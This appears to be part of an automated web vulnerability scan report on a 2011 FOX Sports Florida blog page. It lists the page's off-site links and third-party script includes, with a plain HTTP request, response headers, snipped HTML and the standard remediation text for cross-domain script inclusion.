<li><a href="http://my.msn.com/">My MSN</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268"><strong>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.msn.com/en-us/home">Games</a></li><li><a href="http://moneycentral.msn.com/detail/stock_quote">Quotes</a></li><li><a href="http://wonderwall.msn.com/">Wonderwall</a></li><li><a href="http://astrocenter.astrology.msn.com">Horoscopes</a></li><li><a href="http://realestate.msn.com/">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://yellowpages.msn.com/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://latino.msn.com/">Latino</a></li><li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a></li><li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=FOXSP">Bing</a></span><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div class="selected"><a id="sslink" href="http://msn.foxsports.com/search">Search FS Florida</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the Web</a>
...[SNIP]...
<div>
<a href='http://www.foxsportsarizona.com' target = '_blank' >FS Arizona</a>
<a href='http://www.foxsportscarolinas.com' target = '_blank' >FS Carolinas</a>
<a href='http://www.foxsportsdetroit.com' target = '_blank' >FS Detroit</a>
...[SNIP]...
</a>
<a href='http://www.foxsportshouston.com/' target = '_blank' >FS Houston</a>
<a href='http://www.foxsportskansascity.com' target = '_blank' >FS Kansas City</a>
<a href='http://www.foxsportsmidwest.com' target = '_blank' >FS Midwest</a>
<a href='http://www.foxsportsnorth.com' target = '_blank' >FS North</a>
<a href='http://www.foxsportsohio.com' target = '_blank' >FS Ohio</a>
<a href='http://www.foxsportssouth.com' target = '_blank' >FS South</a>
<a href='http://www.foxsportssouthwest.com' target = '_blank' >FS Southwest</a>
<a href='http://www.foxsportstennessee.com' target = '_blank' >FS Tennessee</a>
<a href='http://www.foxsportswest.com' target = '_blank' >FS West</a>
<a href='http://www.foxsportswisconsin.com' target = '_blank' >FS Wisconsin</a>
<a href='http://www.nesn.com' target = '_blank' >NESN Boston</a>
...[SNIP]...
</a>
<a href='http://foxsportsflorida.stats.com/mlb/teamreports.asp?tm=30&report=schedule' target = '_self' >Schedule</a>
<a href='http://foxsportsflorida.stats.com/mlb/standings.asp' target = '_self' >Standings</a>
<a href='http://foxsportsflorida.stats.com/mlb/teamreports.asp?yr=2010&tm=30&btnGo=Go&report=stats' target = '_self' >Stats</a>
<a href='http://foxsportsflorida.stats.com/mlb/teamreports.asp?yr=2010&tm=30&btnGo=Go&report=roster' target = '_self' >Roster</a>
...[SNIP]...
</a>
<a href='http://foxsportsflorida.stats.com/mlb/teamreports.asp?tm=28&report=schedule' target = '_self' >Schedule</a>
<a href='http://foxsportsflorida.stats.com/mlb/standings.asp' target = '_self' >Standings</a>
<a href='http://foxsportsflorida.stats.com/mlb/teamreports.asp?yr=2010&tm=28&btnGo=Go&report=stats' target = '_self' >Stats</a>
<a href='http://foxsportsflorida.stats.com/mlb/teamreports.asp?yr=2010&tm=28&btnGo=Go&report=roster' target = '_self' >Roster</a>
...[SNIP]...
</a>
<a href='http://foxsportsflorida.stats.com/nba/teamstats.asp?teamno=19&type=schedule' target = '_self' >Schedule</a>
<a href='http://foxsportsflorida.stats.com/nba/standings.asp' target = '_self' >Standings</a>
<a href='http://foxsportsflorida.stats.com/nba/teamstats.asp?teamno=19&btnGo=Go&type=pgstats' target = '_self' >Stats</a>
<a href='http://foxsportsflorida.stats.com/nba/teamstats.asp?teamno=19&btnGo=Go&type=roster' target = '_self' >Roster</a>
...[SNIP]...
</a>
<a href='http://foxsportsflorida.stats.com/nba/teamstats.asp?teamno=14&type=schedule' target = '_self' >Schedule</a>
<a href='http://foxsportsflorida.stats.com/nba/standings.asp' target = '_self' >Standings</a>
<a href='http://foxsportsflorida.stats.com/nba/teamstats.asp?teamno=14&type=pgstats' target = '_self' >Stats</a>
<a href='http://foxsportsflorida.stats.com/nba/teamstats.asp?teamno=14&btnGo=Go&type=roster' target = '_self' >Roster</a>
...[SNIP]...
</a>
<a href='http://foxsportsflorida.stats.com/nhl/teamstats.asp?teamno=20&type=schedule' target = '_self' >Schedule</a>
<a href='http://foxsportsflorida.stats.com/nhl/standings_conference.asp' target = '_self' >Standings</a>
<a href='http://foxsportsflorida.stats.com/nhl/teamstats.asp?teamno=20&type=stats' target = '_self' >Stats</a>
<a href='http://foxsportsflorida.stats.com/nhl/teamstats.asp?type=roster&teamno=20' target = '_self' >Roster</a>
...[SNIP]...
</a>
<a href='http://foxsportsflorida.stats.com/nhl/teamstats.asp?type=schedule&teamno=26' target = '_self' >Schedule</a>
<a href='http://foxsportsflorida.stats.com/nhl/standings_conference.asp' target = '_self' >Standings</a>
<a href='http://foxsportsflorida.stats.com/nhl/teamstats.asp?type=stats&teamno=26' target = '_self' >Stats</a>
<a href='http://foxsportsflorida.stats.com/nhl/teamstats.asp?teamno=26&type=roster' target = '_self' >Roster</a>
...[SNIP]...
</a>
<a href='http://foxsportsflorida.stats.com/cbk/teamstats.asp?yr=2010&report=schedule&team=0210' target = '_self' >MBK Schedule</a>
...[SNIP]...
</a>
<a href='http://foxsportsflorida.stats.com/cbk/teamstats.asp?yr=2010&report=schedule&team=0213' target = '_self' >MBK Schedule</a>
...[SNIP]...
</a>
<a href='http://foxsportsflorida.stats.com/cbk/teamstats.asp?team=0355&report=schedule' target = '_self' >MBK Schedule</a>
...[SNIP]...
<a href="/pages/main"><img src="http://www.foxsportsarizona.com/navtrans1.gif" alt="" alignment="none" border="0" hspace="" vspace=""></a>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.florida/landing_magic_blog;tile=3;sz=728x90;ord=1297475399?" type="text/javascript">
</script>
<noscript><a href="http://ad.doubleclick.net/jump/rsn.florida/landing_magic_blog;tile=3;sz=728x90;ord=1297475399?" target="_self"><img src="http://ad.doubleclick.net/ad/rsn.florida/landing_magic_blog;tile=3;sz=728x90;ord=1297475399?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
11px
height:24px;
line-height:24px;
padding:5px 10px 5px 5px;
background:#fffffff none repeat scroll 0%;
overflow:hidden;
border-style:solid;
border-width:1px 0px 0px 0px;
border-color:#DC3326;


;'>
<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/email.png' border=0> <a href="javascript:void(0);popup('/pages/email_landing?share_url=/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html?blockID=408660^feedID=3722^',300,500);" rel="nofollow">
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/print.png' border=0> <a href="/pages/print_landing?blockID=408660&feedID=3722&" target=_blank rel="nofollow">
...[SNIP]...
IComponent(document.location) + '&t=' + encodeURIComponent('Amway Arena memorabilia, from deodorant to carpet, on auction block') ,'sharer','toolbar=0,status=0,width=626,height=436'));" rel="nofollow"><img src='http://platformic-common.s3.amazonaws.com/global_images/icons/facebook.png' height=16 width=16 border=0 onMouseOver="codeHint(1,'Share on Facebook');" onMouseOut="codeHint(-1);" > Facebook</a>
...[SNIP]...
</div>

<a href="http://twitter.com/share" class="twitter-share-button" data-count="none" >Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<a href="http://www.foxsportsflorida.com/common/dynrss/dynrss_3722_landing_.rss" rel="nofollow"><img src='http://platformic-common.s3.amazonaws.com/global_images/icons/feed.png' height=16 width=16 border=0 ></a>
...[SNIP]...
</div>

<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.foxsportsflorida.com%2Fmsn%2F02%2F11%2F11%2FAmway-Arena-memorabilia-up-for-grabs-at-%2Flanding_magic_blog.html%3FblockID%3D408660%26feedID%3D3722%26&amp;layout=button_count&amp;show-faces=true&amp;width=200&amp;action=like&amp;colorscheme=light" scrolling="no" allowtransparency="true" frameborder="0" style="border:none; width:200px;height:20px;"></iframe>
...[SNIP]...
</a><img style="font-weight: bold;" src="http://www.foxsportswisconsin.com/common/medialib/306/383180.png"><br style="font-weight: bold;">
...[SNIP]...
</span><img style="font-weight: bold;" src="http://www.foxsportswisconsin.com/common/medialib/306/383180.png"><br style="font-weight: bold;">
...[SNIP]...
<em>Be sure to follow <a href="http://twitter.com/fsmagic" target="_blank"><strong>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.florida/landing_magic_blog;tile=3;sz=300x250;ord=1297475399?" type="text/javascript">
</script>
<noscript><a href="http://ad.doubleclick.net/jump/rsn.florida/landing_magic_blog;tile=3;sz=300x250;ord=1297475399?" target="_self"><img src="http://ad.doubleclick.net/ad/rsn.florida/landing_magic_blog;tile=3;sz=300x250;ord=1297475399?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<div id = "right_magic_blog2_284">

<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<td align="left" valign="top"><a

href="http://www.foxsportsarizona.com"

target="_blank">
FOX Sports Arizona</a><br>

<a href="http://www.foxsportscarolinas.com"

target="_blank">
FOX Sports Carolinas</a><br>

<a href="http://www.foxsportsdetroit.com"

target="_blank">
FOX Sports Detroit</a>
...[SNIP]...
<br>

<a href="http://www.foxsportshouston.com"

target="_blank">
FOX Sports Houston</a><br>

<a href="http://www.foxsportskansascity.com"

target="_blank">
FOX Sports Kansas City</a><br>

<a href="http://www.foxsportsmidwest.com"

target="_blank">
FOX Sports Midwest</a><br>
<a

href="http://www.foxsportsnorth.com"

target="_blank">
FOX Sports North</a>
...[SNIP]...
<td align="left" valign"top"><a href="http://www.foxsportsohio.com"

target="_blank">
FOX Sports Ohio</a><br>

<a href="http://www.foxsportssouth.com"

target="_blank">
FOX Sports South</a><br>

<a href="http://www.foxsportssouthwest.com"

target="_blank">
FOX Sports Southwest</a><br>

<a href="http://www.foxsportstennessee.com"

target="_blank">
FOX Sports Tennessee</a><br>

<a href="http://www.foxsportswest.com"

target="_blank">
FOX Sports West</a><br>

<a href="http://www.foxsportswisconsin.com"

target="_blank">
FOX Sports

Wisconsin</a><br>
<a href="http://www.nesn.com"

target="_blank">
NESN Boston</a>
...[SNIP]...
</a> | <a target="_blank" href="http://www.razorgator.com/tickets/sports/" onclick="this.href=this.href+'?c=79-0-0-0-0-0-0&amp;pid=foxsports'">Tickets</a>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-804171h&amp;cg=0&amp;cc=1&amp;ts=noscript"
width="1" height="1" alt="" />

</div>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://g.msn.com/0TO_/enus">Legal</a></li><li><a href="http://advertising.msn.com/msn/">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="http://rss.msn.com">RSS</a>
...[SNIP]...
<li class="first"><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...

4.2. http://www.foxsportsflorida.com/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsflorida.com
Path:   /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html?blockID=408660&feedID=3722 HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 12 Feb 2011 02:03:47 GMT
Date: Sat, 12 Feb 2011 02:03:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 75824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<span class="msnlogo_top"><a href="http://www.msn.com"><img id="msnlogo" src="http://blstc.msn.com/br/gbl/css/10/decoration/logo_sm_msn_rev24.png" title="go to MSN.com" alt="go to MSN.com" /></a>
...[SNIP]...
<li class="c1"><a href="http://entertainment.msn.com/">Entertainment</a>
...[SNIP]...
<li class="first"><a href="http://wonderwall.msn.com/">Celebrities</a>
...[SNIP]...
<li class="new"><a href="http://thebubble.msn.com/ "><strong>
...[SNIP]...
<li><a href="http://entertainment.msn.com/news/?ipp=15">Entertainment News </a>
...[SNIP]...
<li><a href="http://zone.msn.com/en-us/home">Games</a></li><li><a href="http://movies.msn.com/">Movies</a></li><li><a href="http://music.msn.com/">Music</a></li><li><a href="http://movies.msn.com/new-on-dvd/movies/">New on DVD</a></li><li><a href="http://tv.msn.com/"> TV</a></li><li><a href="http://entertainment.msn.com/video/?from=en-us_msnhp"> Video</a>
...[SNIP]...
<li class="c2"><a href="http://moneycentral.msn.com/home.asp">Money</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/"><strong>
...[SNIP]...
<li><a href="http://www.msnbc.msn.com/id/3032072/ns/business">Business News</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://moneycentral.msn.com/investor/home.aspx">Investing</a></li><li><a href="http://moneycentral.msn.com/personal-finance/">Personal Finance</a>
...[SNIP]...
<li><a href="http://moneycentral.msn.com/detail/stock_quote">Quotes</a></li><li><a href="http://realestate.msn.com/">Real Estate &amp; Rentals</a>
...[SNIP]...
<li><a href="http://articles.moneycentral.msn.com/video/default.aspx?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c3"><a href="http://lifestyle.msn.com/">Lifestyle</a>
...[SNIP]...
<li class="first"><a href="http://lifestyle.msn.com/your-look/">Beauty &amp; Fashion</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a></li><li><a href="http://lifestyle.msn.com/your-home/">Decor &amp; Organizing</a>
...[SNIP]...
<li><a href="http://glo.msn.com/">Glo</a></li><li><a href="http://health.msn.com/">Health, Diet &amp; Fitness</a>
...[SNIP]...
<li><a href="http://astrocenter.astrology.msn.com/msn/DeptHoroscope.aspx?When=0&amp;Af=-1000&amp;VS">Horoscopes</a></li><li><a href="http://lifestyle.msn.com/relationships/">Love &amp; Relationships</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670269"><strong>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a></li><li><a href="http://lifestyle.msn.com/your-look/video/?from=en-us_msnhp">Video</a>
...[SNIP]...
<li class="c4 last fluid"><a href="http://specials.msn.com/alphabet.aspx">More</a>
...[SNIP]...
<li class="first"><a href="http://autos.msn.com/">Autos</a></li><li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a></li><li><a href="http://careers.msn.com/">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://my.msn.com/">My MSN</a></li><li><a href="http://local.msn.com/weather.aspx">Weather</a></li><li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://dating.msn.com/index.aspx?TrackingID=516163&amp;BannerID=670268"><strong>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://zone.msn.com/en-us/home">Games</a></li><li><a href="http://moneycentral.msn.com/detail/stock_quote">Quotes</a></li><li><a href="http://wonderwall.msn.com/">Wonderwall</a></li><li><a href="http://astrocenter.astrology.msn.com">Horoscopes</a></li><li><a href="http://realestate.msn.com/">Real Estate/Rentals</a>
...[SNIP]...
<li><a href="http://yellowpages.msn.com/">Yellow Pages</a>
...[SNIP]...
<li><a href="http://latino.msn.com/">Latino</a></li><li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a></li><li><a href="http://local.msn.com/news.aspx">Local Edition</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a></li><li><a href="http://specials.msn.com/alphabet.aspx">Full MSN Index</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=FOXSP">Bing</a></span><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div class="selected"><a id="sslink" href="http://msn.foxsports.com/search">Search FS Florida</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the Web</a>
...[SNIP]...
<div>
<a href='http://www.foxsportsarizona.com' target = '_blank' >FS Arizona</a>
<a href='http://www.foxsportscarolinas.com' target = '_blank' >FS Carolinas</a>
<a href='http://www.foxsportsdetroit.com' target = '_blank' >FS Detroit</a>
...[SNIP]...
</a>
<a href='http://www.foxsportshouston.com/' target = '_blank' >FS Houston</a>
<a href='http://www.foxsportskansascity.com' target = '_blank' >FS Kansas City</a>
<a href='http://www.foxsportsmidwest.com' target = '_blank' >FS Midwest</a>
<a href='http://www.foxsportsnorth.com' target = '_blank' >FS North</a>
<a href='http://www.foxsportsohio.com' target = '_blank' >FS Ohio</a>
<a href='http://www.foxsportssouth.com' target = '_blank' >FS South</a>
<a href='http://www.foxsportssouthwest.com' target = '_blank' >FS Southwest</a>
<a href='http://www.foxsportstennessee.com' target = '_blank' >FS Tennessee</a>
<a href='http://www.foxsportswest.com' target = '_blank' >FS West</a>
<a href='http://www.foxsportswisconsin.com' target = '_blank' >FS Wisconsin</a>
<a href='http://www.nesn.com' target = '_blank' >NESN Boston</a>
...[SNIP]...
</a>
<a href='http://foxsportsflorida.stats.com/mlb/teamreports.asp?tm=30&report=schedule' target = '_self' >Schedule</a>
<a href='http://foxsportsflorida.stats.com/mlb/standings.asp' target = '_self' >Standings</a>
<a href='http://foxsportsflorida.stats.com/mlb/teamreports.asp?yr=2010&tm=30&btnGo=Go&report=stats' target = '_self' >Stats</a>
<a href='http://foxsportsflorida.stats.com/mlb/teamreports.asp?yr=2010&tm=30&btnGo=Go&report=roster' target = '_self' >Roster</a>
...[SNIP]...
</a>
<a href='http://foxsportsflorida.stats.com/mlb/teamreports.asp?tm=28&report=schedule' target = '_self' >Schedule</a>
<a href='http://foxsportsflorida.stats.com/mlb/standings.asp' target = '_self' >Standings</a>
<a href='http://foxsportsflorida.stats.com/mlb/teamreports.asp?yr=2010&tm=28&btnGo=Go&report=stats' target = '_self' >Stats</a>
<a href='http://foxsportsflorida.stats.com/mlb/teamreports.asp?yr=2010&tm=28&btnGo=Go&report=roster' target = '_self' >Roster</a>
...[SNIP]...
</a>
<a href='http://foxsportsflorida.stats.com/nba/teamstats.asp?teamno=19&type=schedule' target = '_self' >Schedule</a>
<a href='http://foxsportsflorida.stats.com/nba/standings.asp' target = '_self' >Standings</a>
<a href='http://foxsportsflorida.stats.com/nba/teamstats.asp?teamno=19&btnGo=Go&type=pgstats' target = '_self' >Stats</a>
<a href='http://foxsportsflorida.stats.com/nba/teamstats.asp?teamno=19&btnGo=Go&type=roster' target = '_self' >Roster</a>
...[SNIP]...
</a>
<a href='http://foxsportsflorida.stats.com/nba/teamstats.asp?teamno=14&type=schedule' target = '_self' >Schedule</a>
<a href='http://foxsportsflorida.stats.com/nba/standings.asp' target = '_self' >Standings</a>
<a href='http://foxsportsflorida.stats.com/nba/teamstats.asp?teamno=14&type=pgstats' target = '_self' >Stats</a>
<a href='http://foxsportsflorida.stats.com/nba/teamstats.asp?teamno=14&btnGo=Go&type=roster' target = '_self' >Roster</a>
...[SNIP]...
</a>
<a href='http://foxsportsflorida.stats.com/nhl/teamstats.asp?teamno=20&type=schedule' target = '_self' >Schedule</a>
<a href='http://foxsportsflorida.stats.com/nhl/standings_conference.asp' target = '_self' >Standings</a>
<a href='http://foxsportsflorida.stats.com/nhl/teamstats.asp?teamno=20&type=stats' target = '_self' >Stats</a>
<a href='http://foxsportsflorida.stats.com/nhl/teamstats.asp?type=roster&teamno=20' target = '_self' >Roster</a>
...[SNIP]...
</a>
<a href='http://foxsportsflorida.stats.com/nhl/teamstats.asp?type=schedule&teamno=26' target = '_self' >Schedule</a>
<a href='http://foxsportsflorida.stats.com/nhl/standings_conference.asp' target = '_self' >Standings</a>
<a href='http://foxsportsflorida.stats.com/nhl/teamstats.asp?type=stats&teamno=26' target = '_self' >Stats</a>
<a href='http://foxsportsflorida.stats.com/nhl/teamstats.asp?teamno=26&type=roster' target = '_self' >Roster</a>
...[SNIP]...
</a>
<a href='http://foxsportsflorida.stats.com/cbk/teamstats.asp?yr=2010&report=schedule&team=0210' target = '_self' >MBK Schedule</a>
...[SNIP]...
</a>
<a href='http://foxsportsflorida.stats.com/cbk/teamstats.asp?yr=2010&report=schedule&team=0213' target = '_self' >MBK Schedule</a>
...[SNIP]...
</a>
<a href='http://foxsportsflorida.stats.com/cbk/teamstats.asp?team=0355&report=schedule' target = '_self' >MBK Schedule</a>
...[SNIP]...
<a href="/pages/main"><img src="http://www.foxsportsarizona.com/navtrans1.gif" alt="" alignment="none" border="0" hspace="" vspace=""></a>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.florida/landing_magic_blog;tile=3;sz=728x90;ord=1297475546?" type="text/javascript">
</script>
<noscript><a href="http://ad.doubleclick.net/jump/rsn.florida/landing_magic_blog;tile=3;sz=728x90;ord=1297475546?" target="_self"><img src="http://ad.doubleclick.net/ad/rsn.florida/landing_magic_blog;tile=3;sz=728x90;ord=1297475546?" width="728" height="90" border="0" alt=""></a>
...[SNIP]...
11px
height:24px;
line-height:24px;
padding:5px 10px 5px 5px;
background:#fffffff none repeat scroll 0%;
overflow:hidden;
border-style:solid;
border-width:1px 0px 0px 0px;
border-color:#DC3326;


;'>
<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/email.png' border=0> <a href="javascript:void(0);popup('/pages/email_landing?share_url=/msn/02/11/11/Amway-Arena-memorabilia-up-for-grabs-at-/landing_magic_blog.html?blockID=408660^feedID=3722^',300,500);" rel="nofollow">
...[SNIP]...
</div>

<img src='http://platformic-common.s3.amazonaws.com/global_images/icons/print.png' border=0> <a href="/pages/print_landing?blockID=408660&feedID=3722&" target=_blank rel="nofollow">
...[SNIP]...
IComponent(document.location) + '&t=' + encodeURIComponent('Amway Arena memorabilia, from deodorant to carpet, on auction block') ,'sharer','toolbar=0,status=0,width=626,height=436'));" rel="nofollow"><img src='http://platformic-common.s3.amazonaws.com/global_images/icons/facebook.png' height=16 width=16 border=0 onMouseOver="codeHint(1,'Share on Facebook');" onMouseOut="codeHint(-1);" > Facebook</a>
...[SNIP]...
</div>

<a href="http://twitter.com/share" class="twitter-share-button" data-count="none" >Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<a href="http://www.foxsportsflorida.com/common/dynrss/dynrss_3722_landing_.rss" rel="nofollow"><img src='http://platformic-common.s3.amazonaws.com/global_images/icons/feed.png' height=16 width=16 border=0 ></a>
...[SNIP]...
</div>

<iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.foxsportsflorida.com%2Fmsn%2F02%2F11%2F11%2FAmway-Arena-memorabilia-up-for-grabs-at-%2Flanding_magic_blog.html%3FblockID%3D408660%26feedID%3D3722%26&amp;layout=button_count&amp;show-faces=true&amp;width=200&amp;action=like&amp;colorscheme=light" scrolling="no" allowtransparency="true" frameborder="0" style="border:none; width:200px;height:20px;"></iframe>
...[SNIP]...
</a><img style="font-weight: bold;" src="http://www.foxsportswisconsin.com/common/medialib/306/383180.png"><br style="font-weight: bold;">
...[SNIP]...
</span><img style="font-weight: bold;" src="http://www.foxsportswisconsin.com/common/medialib/306/383180.png"><br style="font-weight: bold;">
...[SNIP]...
<em>Be sure to follow <a href="http://twitter.com/fsmagic" target="_blank"><strong>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<span style='font-size:10px'>Recommended <img src='http://platformic-common.s3.amazonaws.com/global_images/icons/recommends.png' height=10 width=10 border=0 >(1)</span>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.florida/landing_magic_blog;tile=3;sz=300x250;ord=1297475546?" type="text/javascript">
</script>
<noscript><a href="http://ad.doubleclick.net/jump/rsn.florida/landing_magic_blog;tile=3;sz=300x250;ord=1297475546?" target="_self"><img src="http://ad.doubleclick.net/ad/rsn.florida/landing_magic_blog;tile=3;sz=300x250;ord=1297475546?" width="300" height="250" border="0" alt=""></a>
...[SNIP]...
<div id = "right_magic_blog2_284">

<script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<td align="left" valign="top"><a

href="http://www.foxsportsarizona.com"

target="_blank">
FOX Sports Arizona</a><br>

<a href="http://www.foxsportscarolinas.com"

target="_blank">
FOX Sports Carolinas</a><br>

<a href="http://www.foxsportsdetroit.com"

target="_blank">
FOX Sports Detroit</a>
...[SNIP]...
<br>

<a href="http://www.foxsportshouston.com"

target="_blank">
FOX Sports Houston</a><br>

<a href="http://www.foxsportskansascity.com"

target="_blank">
FOX Sports Kansas City</a><br>

<a href="http://www.foxsportsmidwest.com"

target="_blank">
FOX Sports Midwest</a><br>
<a

href="http://www.foxsportsnorth.com"

target="_blank">
FOX Sports North</a>
...[SNIP]...
<td align="left" valign"top"><a href="http://www.foxsportsohio.com"

target="_blank">
FOX Sports Ohio</a><br>

<a href="http://www.foxsportssouth.com"

target="_blank">
FOX Sports South</a><br>

<a href="http://www.foxsportssouthwest.com"

target="_blank">
FOX Sports Southwest</a><br>

<a href="http://www.foxsportstennessee.com"

target="_blank">
FOX Sports Tennessee</a><br>

<a href="http://www.foxsportswest.com"

target="_blank">
FOX Sports West</a><br>

<a href="http://www.foxsportswisconsin.com"

target="_blank">
FOX Sports

Wisconsin</a><br>
<a href="http://www.nesn.com"

target="_blank">
NESN Boston</a>
...[SNIP]...
</a> | <a target="_blank" href="http://www.razorgator.com/tickets/sports/" onclick="this.href=this.href+'?c=79-0-0-0-0-0-0&amp;pid=foxsports'">Tickets</a>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-804171h&amp;cg=0&amp;cc=1&amp;ts=noscript"
width="1" height="1" alt="" />

</div>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://g.msn.com/0TO_/enus">Legal</a></li><li><a href="http://advertising.msn.com/msn/">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="http://rss.msn.com">RSS</a>
...[SNIP]...
<li class="first"><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...

5. Cross-domain script include  previous
There are 3 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


